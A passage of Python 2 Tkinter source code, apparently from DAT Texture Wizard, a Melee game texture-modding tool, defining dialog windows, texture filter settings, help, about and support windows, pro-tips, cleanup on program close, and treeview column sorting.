    def submit( self, event='' ):
        # Capture the user's input, then close the window
        self.offset = self.offsetEntry.get().strip()
        self.amount = self.amountEntry.get().strip()
        self.window.destroy()

    def cancel( self, event='' ):
        # Signal that no input was given, then close the window
        self.offset = ''
        self.amount = ''
        self.window.destroy()
class popupDropdownWindow( object ): # todo: move to standardized common modules file

    """ Blocking pop-up window that presents a message and a drop-down menu of choices.
        After construction returns (the window was closed), the user's choice can be read
        from self.dropDownValue.get(); it will be '' if the window was canceled.
        Note: 'width' is currently unused; it's kept for backward compatibility. """

    def __init__( self, master, message='', title='', dropdownOptions=None, width=100 ):
        # Use a None default rather than a shared mutable default argument
        if dropdownOptions is None: dropdownOptions = []

        top = self.top = Tk.Toplevel( master )
        top.title( title )
        top.resizable( width=False, height=False )
        top.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox widget.
        top.wm_attributes( '-topmost', 1 ) # Makes window stay topmost to other program windows.

        # Calculate the spawning position of the new window
        rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
        top.geometry( '+' + str(rootDistanceFromScreenLeft + 200) + '+' + str(rootDistanceFromScreenTop + 140) )

        # Add a message for the user and the Drop-down widget for user input
        ttk.Label( top, text=message ).pack( pady=5 )
        self.dropDownValue = Tk.StringVar()
        # Raises IndexError if no options are provided (same as the prior behavior)
        self.dropdown = ttk.OptionMenu( top, self.dropDownValue, dropdownOptions[0], *dropdownOptions )
        self.dropdown.pack( padx=5, pady=6 )

        # Add the OK/Cancel buttons
        buttonsFrame = ttk.Frame( top )
        self.okButton = ttk.Button( buttonsFrame, text='Ok', command=self.cleanup )
        self.okButton.pack( side='left', padx=10 )
        ttk.Button( buttonsFrame, text='Cancel', command=self.cancel ).pack( side='left', padx=10 )
        top.protocol( 'WM_DELETE_WINDOW', self.cancel ) # Overrides the 'X' close button.
        buttonsFrame.pack( pady=7 )

        # Move focus to this window (for keyboard control), and pause execution of the main window/thread until this window is closed.
        self.dropdown.focus_set()
        master.wait_window( top ) # Pauses execution of the calling function until this window is closed.

    def cleanup( self, event='' ):
        """ OK button handler; keeps the current selection and closes the window. """
        self.top.destroy()

    def cancel( self, event='' ):
        """ Cancel/close handler; clears the selection so the caller sees no choice was made. """
        self.dropDownValue.set( '' )
        self.top.destroy()
def selectAll( event ): # Adds bindings for normal CTRL-A functionality.
    """ Selects all text within the widget that generated the event (Text or ttk Entry). """
    widgetClass = event.widget.winfo_class()
    if widgetClass == 'Text':
        event.widget.tag_add( 'sel', '1.0', 'end' )
    elif widgetClass == 'TEntry':
        event.widget.selection_range( 0, 'end' )
def restoreEditedEntries( editedEntries ):
    """ Changes the background color of any edited entry widgets (Image Data Headers,
        Texture Struct properties, etc.) back to their default, clearing the visual
        "edited" indication. Widgets that no longer exist are skipped. """
    for widget in editedEntries:
        if not widget.winfo_exists(): continue

        if isinstance( widget, HexEditDropdown ): # A ttk widget; changes background color using a style
            widget.configure( style='TMenubutton' )
        else:
            # DisguisedEntry widgets (e.g. the Game ID entry field) remember their
            # native system background color; everything else just reverts to white
            defaultSystemBgColor = getattr( widget, 'defaultSystemBgColor', None )
            widget.configure( background=defaultSystemBgColor or 'white' )
editedEntries = [] # Entry widgets whose background was changed to mark pending in-GUI edits; reverted via restoreEditedEntries()
def onProgramClose():
    """ Called when the user attempts to close the program. Aborts the close if the user
        declines to discard unsaved changes; otherwise performs clean-up (optionally deleting
        dumped texture images, and removing temp files if no hex editor appears to be using
        them) and destroys the main window. """
    global programClosing

    # Make sure there aren't any changes pending to be saved (warns user if there are).
    if globalDatFile and not globalDatFile.noChangesToBeSaved( programClosing ): return
    elif globalBannerFile and not globalBannerFile.noChangesToBeSaved( programClosing ): return
    elif not noDiscChangesToBeSaved(): return

    programClosing = True
    Gui.root.aboutWindow = None # Ends the infinite loop the aboutWindow generates.

    # Shut down other decoding processes or threads that may be running
    #cancelCurrentRenders() # Should be enabled if multiprocessing is enabled

    # Check if the texture dumps should be deleted.
    if generalBoolSettings['deleteImageDumpsOnExit'].get() and os.path.exists( texDumpsFolder ):
        # Remove every file and sub-folder in the dumps folder; failures are shown but non-fatal
        for the_file in os.listdir(texDumpsFolder):
            file_path = os.path.join(texDumpsFolder, the_file)
            try:
                if os.path.isfile(file_path): os.remove(file_path)
                elif os.path.isdir(file_path): shutil.rmtree(file_path)
            except Exception as e: msg( e )

    # Delete any temporary files that may be left over, only if they are not in use (may be used by a hex editor if it's open)!
    try: # Precaution. Really don't want this function to fail!
        hexEditorPath = settings.get('General Settings', 'hexEditorPath')
        tempFolder = scriptHomeFolder + '\\bin\\tempFiles\\'

        if programClosing and hexEditorPath and os.path.exists( tempFolder ):
            hexProgramName = os.path.basename( hexEditorPath )

            # Scan the running processes for the configured hex editor program
            for process in psutil.process_iter():
                if process.name().lower() == hexProgramName.lower(): break
            else: # Loop above didn't break; the hex editor doesn't appear to be running
                try: shutil.rmtree( tempFolder )
                except: print 'Unable to delete the hex temp folder for an unknown reason.'
    except: print 'unexplained error while checking processes for a running hex editor'

    # Close the program.
    if programClosing: # If a DAT is being scanned, let that loop finish its current iteration and then close the program, to avoid errors.
        Gui.root.destroy() # Stops the GUI's mainloop and destroys all widgets: https://stackoverflow.com/a/42928131/8481154
def setImageFilters(): #todo should be a class
    """ Opens (or re-shows) the "Texture Filters" window, which lets the user define criteria
        (width, height, aspect ratio, texture type, and file offset) used to filter which
        textures are shown when scanning a file. Values are persisted to the settings file. """
    if Gui.root.imageFiltersWindow != None: Gui.root.imageFiltersWindow.deiconify()
    else:
        loadSettings() # Persistent storage from settings.ini

        imageFiltersWindow = Tk.Toplevel()
        imageFiltersWindow.title('Texture Filters')
        imageFiltersWindow.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.

        # Calculate the spawning position of the new window
        rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
        imageFiltersWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 70) + '+' + str(rootDistanceFromScreenTop + 70) )
        Gui.root.imageFiltersWindow = imageFiltersWindow

        mainFrame = Tk.Frame(imageFiltersWindow)
        ttk.Label(mainFrame, text='Only show textures that meet this criteria:').pack(padx=10, pady=4)

        # Each filter row below: a comparison-operator drop-down plus a value entry

        # Width filter
        widthTuple = imageFilters['widthFilter']
        row1 = Tk.Frame(mainFrame)
        ttk.Label(row1, text='Width: ').pack(side='left')
        widthComparator = Tk.StringVar()
        widthComparator.set( widthTuple[0] )
        Tk.OptionMenu(row1, widthComparator, '<', '<=', '=', '>', '>=').pack(side='left')
        widthValue = Tk.StringVar()
        widthValue.set( widthTuple[1] )
        Tk.Entry(row1, textvariable=widthValue, width=6).pack(side='left')
        row1.pack(padx=10, pady=4)

        # Height filter
        heightTuple = imageFilters['heightFilter']
        row2 = Tk.Frame(mainFrame)
        ttk.Label(row2, text='Height: ').pack(side='left')
        heightComparator = Tk.StringVar()
        heightComparator.set( heightTuple[0] )
        Tk.OptionMenu(row2, heightComparator, '<', '<=', '=', '>', '>=').pack(side='left')
        heightValue = Tk.StringVar()
        heightValue.set( heightTuple[1] )
        Tk.Entry(row2, textvariable=heightValue, width=6).pack(side='left')
        row2.pack(padx=10, pady=4)

        # Aspect ratio filter
        aspectRatioTuple = imageFilters['aspectRatioFilter']
        row3 = Tk.Frame(mainFrame)
        ttk.Label(row3, text='Aspect Ratio: ').pack(side='left')
        aspectRatioComparator = Tk.StringVar()
        aspectRatioComparator.set( aspectRatioTuple[0] )
        Tk.OptionMenu(row3, aspectRatioComparator, '<', '<=', '=', '>', '>=').pack(side='left')
        aspectRatioValue = Tk.StringVar()
        aspectRatioValue.set( aspectRatioTuple[1] )
        Tk.Entry(row3, textvariable=aspectRatioValue, width=6).pack(side='left')
        row3.pack(padx=10, pady=4)

        # Texture type filter
        imageTypeTuple = imageFilters['imageTypeFilter']
        row4 = Tk.Frame(mainFrame)
        ttk.Label(row4, text='Texture Type: ').pack(side='left')
        imageTypeComparator = Tk.StringVar()
        imageTypeComparator.set( imageTypeTuple[0] )
        Tk.OptionMenu(row4, imageTypeComparator, '<', '<=', '=', '>', '>=').pack(side='left')
        imageTypeValue = Tk.StringVar()
        imageTypeValue.set( imageTypeTuple[1] )
        Tk.Entry(row4, textvariable=imageTypeValue, width=6).pack(side='left')
        row4.pack(padx=10, pady=4)

        # File offset filter
        offsetTuple = imageFilters['offsetFilter']
        row5 = Tk.Frame(mainFrame)
        ttk.Label(row5, text='Offset (location in file): ').pack(side='left')
        offsetComparator = Tk.StringVar()
        offsetComparator.set( offsetTuple[0] )
        Tk.OptionMenu(row5, offsetComparator, '<', '<=', '=', '>', '>=').pack(side='left')
        offsetValue = Tk.StringVar()
        offsetValue.set( offsetTuple[1] )
        Tk.Entry(row5, textvariable=offsetValue, width=10).pack(side='left')
        row5.pack(padx=10, pady=4)

        # Button functions
        def close():
            Gui.root.imageFiltersWindow.destroy()
            Gui.root.imageFiltersWindow = None
        imageFiltersWindow.protocol('WM_DELETE_WINDOW', close) # Overrides the 'X' close button.

        def save():
            # Validates all filter values and writes them to the program state and settings
            # file. Returns True on success, False if anything couldn't be saved.
            if not os.path.exists( settingsFile ):
                msg( 'Unable to find the settings file. Reloading this window should recreate it.' )
                return False

            unsavedSettings = []
            with open( settingsFile, 'w') as theSettingsFile:
                # For each setting, if the value is a number or blank, update the value and its comparator in the program and settings file.
                width = widthValue.get().replace(',', '')
                if not isNaN(width) or width == '':
                    imageFilters['widthFilter'] = ( widthComparator.get(), width )
                    settings.set( 'Texture Search Filters', 'widthFilter', widthComparator.get() + '|' + width )
                else: unsavedSettings.append( 'width' )
                height = heightValue.get().replace(',', '')
                if not isNaN(height) or height == '':
                    imageFilters['heightFilter'] = ( heightComparator.get(), height )
                    settings.set( 'Texture Search Filters', 'heightFilter', heightComparator.get() + '|' + height )
                else: unsavedSettings.append( 'height' )
                aspectRatio = aspectRatioValue.get()
                try:
                    # Make sure that the aspect ratio can be converted to a number.
                    if ':' in aspectRatio:
                        numerator, denominator = aspectRatio.split(':')
                        convertedAspectRatio = float(numerator) / float(denominator)
                    elif '/' in aspectRatio:
                        numerator, denominator = aspectRatio.split('/')
                        convertedAspectRatio = float(numerator) / float(denominator)
                    elif aspectRatio != '': convertedAspectRatio = float(aspectRatio)

                    if aspectRatio == '' or not isNaN( convertedAspectRatio ):
                        imageFilters['aspectRatioFilter'] = ( aspectRatioComparator.get(), aspectRatio )
                        settings.set( 'Texture Search Filters', 'aspectRatioFilter', aspectRatioComparator.get() + '|' + aspectRatio )
                    else: unsavedSettings.append( 'aspect ratio' )
                except:
                    unsavedSettings.append( 'aspect ratio' )
                imageType = imageTypeValue.get().replace('_', '') # Underscores allowed as visual separators
                if not isNaN(imageType) or imageType == '':
                    imageFilters['imageTypeFilter'] = ( imageTypeComparator.get(), imageType )
                    settings.set( 'Texture Search Filters', 'imageTypeFilter', imageTypeComparator.get() + '|' + imageType )
                else: unsavedSettings.append( 'texture type' )
                offset = offsetValue.get().replace(',', '')
                if (validOffset(offset) and not isNaN(int(offset,16))) or offset == '':
                    imageFilters['offsetFilter'] = ( offsetComparator.get(), offset )
                    settings.set( 'Texture Search Filters', 'offsetFilter', offsetComparator.get() + '|' + offset )
                else: unsavedSettings.append( 'offset' )
                settings.write( theSettingsFile )

            if unsavedSettings != []:
                msg('The filters for ' + grammarfyList( unsavedSettings ) + ' could not be saved. The entries must be a number or left blank, with the '
                    'exception of aspect ratio (which may be a number, fraction, float (decimal), or a ratio like "4:3").')
                imageFiltersWindow.lift()
                return False
            else: return True

        def saveNclose():
            successfullySaved = save()
            # If saving doesn't work or the settings file wasn't found, don't close the window, so the settings aren't lost.
            if successfullySaved: close()

        def saveNreload():
            success = save()
            if success: # If the settings file wasn't found, don't close the window, so the settings aren't lost.
                close()
                clearDatTab()
                # NOTE(review): scanDat() is called here AND the comment below claims the tab-change
                # handler will call it again — confirm whether the double scan is intentional.
                scanDat()

                # Switch to the DAT Texture Tree tab
                Gui.mainTabFrame.select( Gui.datTab ) # scanDat will now be called by the onMainTabChanged event handler

        def clear(): # Set all values back to default.
            widthComparator.set( '=' )
            widthValue.set( '' )
            heightComparator.set( '=' )
            heightValue.set( '' )
            aspectRatioComparator.set( '=' )
            aspectRatioValue.set( '' )
            imageTypeComparator.set( '=' )
            imageTypeValue.set( '' )
            offsetComparator.set( '=' )
            offsetValue.set( '' )

        # The buttons.
        row6 = Tk.Frame( mainFrame, width=200 )
        btnFrame = Tk.Frame(row6)
        ttk.Button( btnFrame, text='Clear',command=clear ).pack( side='left', padx=5 )
        ttk.Button( btnFrame, text='Save', command=saveNclose ).pack( side='right', padx=5 )
        btnFrame.pack()
        ttk.Button( row6, text='Save and Rescan Textures', command=saveNreload ).pack( fill='x', padx=5, pady=4 )
        row6.pack( pady=4 )
        mainFrame.pack()
def showHelpWindow():
	""" Displays a small toolwindow with links to documentation and community resources,
		plus a randomly chosen pro-tip. Only one instance is kept (tracked on
		Gui.root.helpWindow); re-invoking restores the existing window. """
	if Gui.root.helpWindow != None: Gui.root.helpWindow.deiconify()
	else:
		loadSettings() # Persistent storage from settings.ini
		# Define the window
		helpWindow = Tk.Toplevel()
		helpWindow.title('Help')
		helpWindow.attributes('-toolwindow', 1) # Makes window framing small, like a toolbox/widget.
		helpWindow.resizable(width=False, height=False)
		helpWindow.wm_attributes('-topmost', 1) # Makes window stay topmost (main program still usable).
		Gui.root.helpWindow = helpWindow
		# Calculate the spawning position of the new window
		rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
		helpWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 180) + '+' + str(rootDistanceFromScreenTop + 140) )
		helpWindow.focus()
		mainFrame = Tk.Frame(helpWindow)
		# Button functions
		def close():
			# Clear the stored reference so a fresh window is built next time
			Gui.root.helpWindow.destroy()
			Gui.root.helpWindow = None
		helpWindow.protocol('WM_DELETE_WINDOW', close) # Overrides the 'X' close button.
		def gotoWorkshop( event ): webbrowser.open( 'http://smashboards.com/forums/melee-workshop.271/' )
		def gotoOfficialThread( event ): webbrowser.open( 'http://smashboards.com/threads/new-tools-for-texture-hacking.373777/' )
		def gotoHowToHackAnyTexture( event ): webbrowser.open( 'http://smashboards.com/threads/how-to-hack-any-texture.388956/' )
		def gotoMeleeHacksAndYou( event ): webbrowser.open( 'http://smashboards.com/threads/melee-hacks-and-you-updated-5-21-2015.247119/#post-4917885' )
		label = ttk.Label( mainFrame, text='- = The Melee Workshop = -', foreground='#00F', cursor='hand2' )
		label.bind( '<1>', gotoWorkshop )
		label.pack(pady=4)
		gridSection = Tk.Frame( mainFrame ) # These contents are grouped together so they can use the grid geometry manager rather than .pack()
		ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=0, columnspan=2 )
		label = ttk.Label( gridSection, text='Read Up on Program Usage', foreground='#00F', cursor='hand2' )
		label.bind( '<1>', showReadMeFile )
		label.grid( column=0, row=1 )
		ttk.Label( gridSection, text='For documentation on this program').grid( column=1, row=1 )
		ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=2, columnspan=2 )
		label = ttk.Label( gridSection, text="DTW's Official Thread", foreground='#00F', cursor='hand2' )
		label.bind('<1>', gotoOfficialThread)
		label.grid( column=0, row=3 )
		ttk.Label( gridSection, text='Questions, feature requests, and other discussion on '
			'this program can be posted here').grid( column=1, row=3 )
		ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=4, columnspan=2 )
		label = ttk.Label( gridSection, text='How to Hack Any Texture', foreground='#00F', cursor='hand2' )
		label.bind('<1>', gotoHowToHackAnyTexture)
		label.grid( column=0, row=5 )
		ttk.Label( gridSection, text="If for some reason your texture doesn't "
			"appear in this program, then you can fall back onto this thread").grid( column=1, row=5 )
		ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=6, columnspan=2 )
		label = ttk.Label( gridSection, text='OP of Melee Hacks and You', foreground='#00F', cursor='hand2' )
		label.bind('<1>', gotoMeleeHacksAndYou)
		label.grid( column=0, row=7 )
		ttk.Label( gridSection, text='The first post in this thread contains many '
			'resources on all subjects to help you get started').grid( column=1, row=7 )
		ttk.Label( gridSection, image=Gui.imageBank('helpWindowDivider') ).grid( column=0, row=8, columnspan=2 )
		# Wrap the description labels (column 1) and pad all cells uniformly
		for label in gridSection.grid_slaves( column=1 ):
			label.config( wraplength=220 )
		for label in gridSection.winfo_children():
			label.grid_configure( ipady=4, padx=7 )
		gridSection.pack( padx=4 )
		# proTips keys are contiguous integers starting at 1, so randint(1, len) hits every entry
		ttk.Label( mainFrame, text='Random Pro-tip: ' + proTips[random.randint( 1, len(proTips) )], wraplength=380 ).pack( padx=4, pady=12 )
		mainFrame.pack()
# Tips shown (randomly chosen) at the bottom of the Help window. Keys must remain
# contiguous integers starting at 1, since showHelpWindow selects one via
# random.randint( 1, len(proTips) ).
proTips = {
	1: ( "Did you know that you can drag-and-drop files directly onto "
		 "the program icon (the .exe file) or the GUI to open them?" ),
	2: ( "There are multiple useful behaviors you can call upon when importing textures:"
		 "\n- When viewing the contents of a disc on the 'Disc File Tree' tab. The imported "
		 "texture's destination will be determined by the file's name. For example, "
		 'the file "MnSlMap.usd_0x38840_2.png" would be imported into the disc in the file "MnSlMap.usd" '
		 "at offset 0x38840. This can be very useful for bulk importing many textures at once."
		 "\n- Navigate to a specific texture in the 'DAT Texture Tree' tab, select a texture, and you "
		 'can import a texture to replace it with without concern for how the file is named.' ),
	3: ( 'The color of the status message ("File Scan Complete", etc.) is purely used to indicate '
		 "whether or not there are changes that have yet to be saved. Green means everything has "
		 "been saved to disc/file. Red means there are changes that have not yet been saved." ),
	4: ( "For CSPs (Character Select Portraits), if you're trying to mimic "
		 "the game's original CSP shadows, they are 10px down and 10px to the left." ),
	5: ( "Use the boost to chase!" ),
	6: ( "When working in GIMP and opting to use a palette, it's important that you delete "
		 "ALL hidden and unused layers BEFORE generating a palette for your texture. "
		 "This is because if other layers are present, even if not visible, GIMP "
		 "will take their colors into account to generate a palette. (If you have a lot of "
		 "layers, an easier method may be to create a 'New from Visible' layer, and then copy that "
		 "to a new, blank project.)" ),
	7: ( "Did you know that if you hold SHIFT while right-clicking "
		 "on a file in Windows, there appears a context menu option called "
		 "'Copy as path'? This will copy the file's full path into your clipboard, "
		 "so you can then easily paste it into one of this program's text fields." ),
	8: ( 'A quick and easy way to view file structures relating to a given texture is to use '
		 'the "Show in Structural Analysis" feature, found by right-clicking on a texture.' ),
	9: ( "You don't have to close this program in order to run your disc in Dolphin "
		 '(though you do need to stop emulation if you want to save changes to the disc).' ),
	10: ( "DODONGO DISLIKES SMOKE." ),
	11: ( "Have you ever noticed those dotted lines at the top of the 'Open Recent' "
		  "and 'Texture Operations' menus? Try clicking on one sometime! It will turn the menu into a window for fast-access." ),
	12: ( "If you click on one of the 'Disc Shortcuts' before loading a disc, DTW will load the "
		  "last disc that you've used, and then jump to the appropriate section. They're two shortcuts in one!" ),
	13: ( "When DTW builds a disc from a root folder of files, it can build a ISO that's a good amount smaller than the "
		  "standard disc size of ~1.35 GB (1,459,978,240 bytes). Useful if you want to add more or larger files." ),
	14: ( 'You can actually modify the amount of empty space, or "padding", present between files in your ISO. A small '
		  'amount of padding allows for more files or total data in the same size ISO. While more padding allows you to '
		  'replace/import larger files without having to rebuild the disc.' ),
	15: ( "Did you notice the cheese in the toilet? It's in every level." ),
	16: ( "This program has a lot of lesser-known but very useful features, some of which aren't easily found "
		  "by browsing the GUI. Check out the Program Usage.txt to find them all." ),
	#17: ( '' ),
	#18: ( '' ),
	#19: ( '' ),
	#20: ( "IT'S A SECRET TO EVERYBODY." ),
}
def showReadMeFile( event=None ): # May take a click event from the help window click binding
	""" Opens the 'Program Usage.txt' documentation file (in the program's home folder)
		with the system's default text editor. Shows an error message if it can't be opened. """
	filePath = os.path.join( scriptHomeFolder, 'Program Usage.txt' ) # os.path.join is safer than manual '\\' concatenation
	try:
		os.startfile( filePath )
	except Exception: # File missing, or no application associated with .txt files
		msg( "Couldn't find the 'Program Usage.txt' file!" )
def showSupportWindow():
	""" Shows a small window with an image containing clickable donation links
		(PayPal and Patreon) for supporting the program's development. """
	# Define the window
	helpWindow = Tk.Toplevel( Gui.root )
	helpWindow.title( 'Support DTW' )
	helpWindow.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
	helpWindow.resizable( width=False, height=False )
	helpWindow.wm_attributes( '-topmost', 1 ) # Makes window stay topmost (main program still usable).
	# Calculate the spawning position of the new window
	rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
	helpWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 120) + '+' + str(rootDistanceFromScreenTop + 100) )
	helpWindow.focus()
	mainCanvas = Tk.Canvas( helpWindow, bg='#101010', width=640, height=394, borderwidth=0, highlightthickness=0 )
	# Create and attach the background
	mainCanvas.create_image( 0, 0, image=Gui.imageBank('supportDTW'), anchor='nw' )
	# Create rectangles over the image to use as buttons
	# (invisible hit-areas positioned over the link text baked into the background image)
	mainCanvas.create_rectangle( 288, 224, 357, 245, outline="", tags=('paypalLink', 'link') )
	mainCanvas.create_rectangle( 350, 292, 432, 310, outline="", tags=('patreonLink', 'link') )
	# Bind a click event on the buttons to hyperlinks
	def gotoPaypal( event ): webbrowser.open( r'https://www.paypal.com/cgi-bin/webscr?cmd=_donations&business=K95AJCMZDR7CG&lc=US&item_name=Melee%20Modding&item_number=DTW&currency_code=USD&bn=PP%2dDonationsBF%3abtn_donate_SM%2egif%3aNonHosted' )
	def gotoPatreon( event ): webbrowser.open( r'https://www.patreon.com/drgn' )
	mainCanvas.tag_bind( 'paypalLink', '<1>', gotoPaypal )
	mainCanvas.tag_bind( 'patreonLink', '<1>', gotoPatreon )
	# Bind mouse hover events for buttons, for the cursor
	def changeCursorToHand( event ): helpWindow.config( cursor='hand2' )
	def changeCursorToArrow( event ): helpWindow.config( cursor='' )
	mainCanvas.tag_bind( 'link', '<Enter>', changeCursorToHand )
	mainCanvas.tag_bind( 'link', '<Leave>', changeCursorToArrow )
	mainCanvas.pack( pady=0, padx=0 )
def showAboutWindow(): # todo: should be a class based off of basicWindow
	""" Shows the 'About' window, with author/version info and a continuously
		animated revolving banner. Only one instance is kept (tracked on
		Gui.root.aboutWindow); re-invoking restores the existing window.

		NOTE(review): the animation below is a blocking while-loop that only yields via
		time.sleep/canvas.update; it runs until the window is closed. """
	if Gui.root.aboutWindow != None: Gui.root.aboutWindow.deiconify()
	else:
		# Define the window
		aboutWindow = Tk.Toplevel( Gui.root )
		aboutWindow.title( 'DAT Texture Wizard' )
		aboutWindow.attributes( '-toolwindow', 1 ) # Makes window framing small, like a toolbox/widget.
		aboutWindow.resizable( width=False, height=False )
		aboutWindow.wm_attributes( '-topmost', 1 )
		Gui.root.aboutWindow = aboutWindow
		# lulz
		Gui.root.aboutWindow.originalProgramStatus = Gui.programStatus.get() # Remembered so it can be restored on close
		updateProgramStatus( 'Too good!' )
		# Calculate the spawning position of the new window
		rootDistanceFromScreenLeft, rootDistanceFromScreenTop = getWindowGeometry( Gui.root )[2:]
		aboutWindow.geometry( '+' + str(rootDistanceFromScreenLeft + 240) + '+' + str(rootDistanceFromScreenTop + 170) )
		aboutWindow.focus()
		# Button functions
		def close():
			# Restore the status message that was displayed before this window opened,
			# and clear the reference (which also ends the animation loop below).
			updateProgramStatus( Gui.root.aboutWindow.originalProgramStatus )
			Gui.root.aboutWindow.destroy()
			Gui.root.aboutWindow = None
		aboutWindow.protocol( 'WM_DELETE_WINDOW', close ) # Overrides the 'X' close button.
		# Create the canvas
		aboutCanvas = Tk.Canvas( aboutWindow, bg='#101010', width=350, height=247 )
		aboutCanvas.pack()
		# Define a few images (stored on the canvas to keep references alive)
		aboutCanvas.bannerImage = Gui.imageBank( 'pannerBanner' ) # 604x126
		aboutCanvas.hoverOverlayImage = Gui.imageBank('hoverOverlay')
		aboutCanvas.blankBoxImage = ImageTk.PhotoImage( Image.new('RGBA', (182,60)) ) # Sits behind the main background (same size/position as bgbg).
		# Attach the images to the canvas
		aboutCanvas.create_image( 88, 98, image=Gui.imageBank('bgbg'), anchor='nw' ) # Sits behind the main background (182x60).
		aboutCanvas.create_image( 10, 123, image=aboutCanvas.bannerImage, anchor='w', tags='r2lBanners' )
		aboutCanvas.create_image( 340, 123, image=aboutCanvas.bannerImage, anchor='e', tags='l2rBanners' )
		foregroundObject = aboutCanvas.create_image( 2, 2, image=Gui.imageBank('bg'), anchor='nw' ) # The main background, the mask (350x247).
		# Define and attach the text to the canvas
		windowFont = tkFont.Font(family='MS Serif', size=11, weight='normal')
		aboutCanvas.create_text( 207, 77, text='C r e a t e d b y', fill='#d4d4ef', font=windowFont )
		aboutCanvas.create_text( 207, 174, text='Version ' + programVersion, fill='#d4d4ef', font=windowFont )
		aboutCanvas.create_text( 207, 204, text='Written in Python v' + sys.version.split()[0] + '\nand tKinter v' + str( Tk.TkVersion ),
			justify='center', fill='#d4d4ef', font=windowFont )
		# Create a "button", and bind events for the mouse pointer, and for going to my profile page on click.
		aboutCanvas.create_image( 82, 98, image=aboutCanvas.blankBoxImage, activeimage=aboutCanvas.hoverOverlayImage, anchor='nw', tags='profileLink' ) # 88 in v4.3
		def gotoProfile( event ): webbrowser.open( 'http://smashboards.com/members/drgn.21936/' )
		def changeCursorToHand( event ): aboutWindow.config( cursor='hand2' )
		def changeCursorToArrow( event ): aboutWindow.config( cursor='' )
		aboutCanvas.tag_bind( 'profileLink', '<1>', gotoProfile )
		aboutCanvas.tag_bind( 'profileLink', '<Enter>', changeCursorToHand )
		aboutCanvas.tag_bind( 'profileLink', '<Leave>', changeCursorToArrow )
		# v Creates an infinite "revolving" image between the two background elements.
		i = 0
		while Gui.root.aboutWindow != None: # Ends when close() clears the reference
			if i == 0:
				# Spawn a fresh pair of banner copies just off-screen, so the scroll appears seamless
				aboutCanvas.create_image( 614, 123, image=aboutCanvas.bannerImage, anchor='w', tags='r2lBanners' )
				aboutCanvas.create_image( 340 - 604, 123, image=aboutCanvas.bannerImage, anchor='e', tags='l2rBanners' )
				aboutCanvas.tag_lower( 'r2lBanners', foregroundObject ) # Update the layer order to keep the foreground on top.
				aboutCanvas.tag_lower( 'l2rBanners', foregroundObject ) # Update the layer order to keep the foreground on top.
			i += 1
			aboutCanvas.move( 'r2lBanners', -1, 0 )
			aboutCanvas.move( 'l2rBanners', 1, 0 )
			time.sleep( .13 ) # Value in seconds
			aboutCanvas.update()
			if i == 604: # Delete the first banner, so the canvas isn't infinitely long
				aboutCanvas.delete( aboutCanvas.find_withtag('r2lBanners')[0] )
				aboutCanvas.delete( aboutCanvas.find_withtag('l2rBanners')[0] )
				i = 0
def treeview_sort_column( treeview, col, reverse ):
	""" Sorts a treeview column, alternating sort direction on successive calls
		(each call rebinds the column header to the opposite direction).

		For the Disc File Tree ('file' column), sorting flattens the folder structure and
		orders files by disc offset; pending disc changes must be saved first. The reversed
		sort restores the original view by rescanning the disc or root folder. For DAT
		Texture Tree columns, rows are reordered in-place. """
	# Create a list of the items, as tuples of (statOfInterest, iid), and sort them.
	if col == 'file':
		if os.path.exists( globalDiscDetails['isoFilePath'] ): # Means that a disc has been loaded.
			# Make sure the disc doesn't have any changes that need saving first
			if unsavedDiscChanges and not globalDiscDetails['rebuildRequired']:
				okToSave = tkMessageBox.askyesno( 'OK to save disc changes?',
					'Changes to the disc must be saved before sorting its files.\n\nWould you like to save changes to the disc now?' )
				# Attempt to save, and exit this function if there was a problem.
				if not okToSave or not saveChanges(): return
			if not reverse: # The default upon starting the program.
				rootIid = Gui.isoFileTree.get_children()[0]
				rowsList = []
				foldersToDelete = []
				def sortChildren( parent ):
					# Recursively collects (offset, iid) pairs for files, noting folders for later removal
					for iid in treeview.get_children( parent ):
						description, entity, isoOffset, fileSize, isoPath, source, data = treeview.item( iid, 'values' )
						if entity == 'folder':
							# Organize the contents of the folder first (so that the first file's offset, to use for this folder, will be the first of the set).
							sortChildren( iid )
							foldersToDelete.append( iid )
						else:
							# Add this file to the sorting list.
							rowsList.append( (int(isoOffset, 16), iid) )
				sortChildren( rootIid )
				# Sort the items in the treeview.
				rowsList.sort( reverse=reverse )
				for index, ( columnValue, iid ) in enumerate( rowsList ): treeview.move( iid, rootIid, index )
				# Remove the folders from the treeview.
				for folder in foldersToDelete: treeview.delete( folder )
				# Update the treeview's header text and its function call for the next (reversed) sort.
				treeview.heading( '#0', text='File (Sorted by Offset)' )
				treeview.heading( '#0', command=lambda: treeview_sort_column(treeview, col, True) )
			else:
				# Reversed sort; restore the normal folder-structured view by rescanning
				if isRootFolder( globalDiscDetails['isoFilePath'], showError=False )[0]: scanRoot()
				else: scanDisc()
	else:
		# DAT Texture Tree columns; build a (sortKey, iid) pair for every top-level row
		if col == 'texture': rowsList = [( int(treeview.set(iid, col).split()[0],16), iid ) for iid in treeview.get_children('')] # Sort by offset (hex)
		elif col == 'dimensions': rowsList = [( int(treeview.set(iid, col).split(' x ')[0]) * int(treeview.set(iid, col).split(' x ')[1]), iid ) for iid in treeview.get_children('')] # Sort by pixel area
		elif col == 'type': rowsList = [( treeview.set(iid, col).replace('_', ''), iid ) for iid in treeview.get_children('')]
		# Sort the rows and rearrange the treeview based on the newly sorted list.
		rowsList.sort(reverse=reverse)
		for index, ( columnValue, iid ) in enumerate( rowsList ): treeview.move( iid, '', index )
		# Set the function call for the next (reversed) sort.
		treeview.heading(col, command=lambda: treeview_sort_column( treeview, col, not reverse ))
def scanDiscItemForStats( iidSelectionsTuple, folder ):
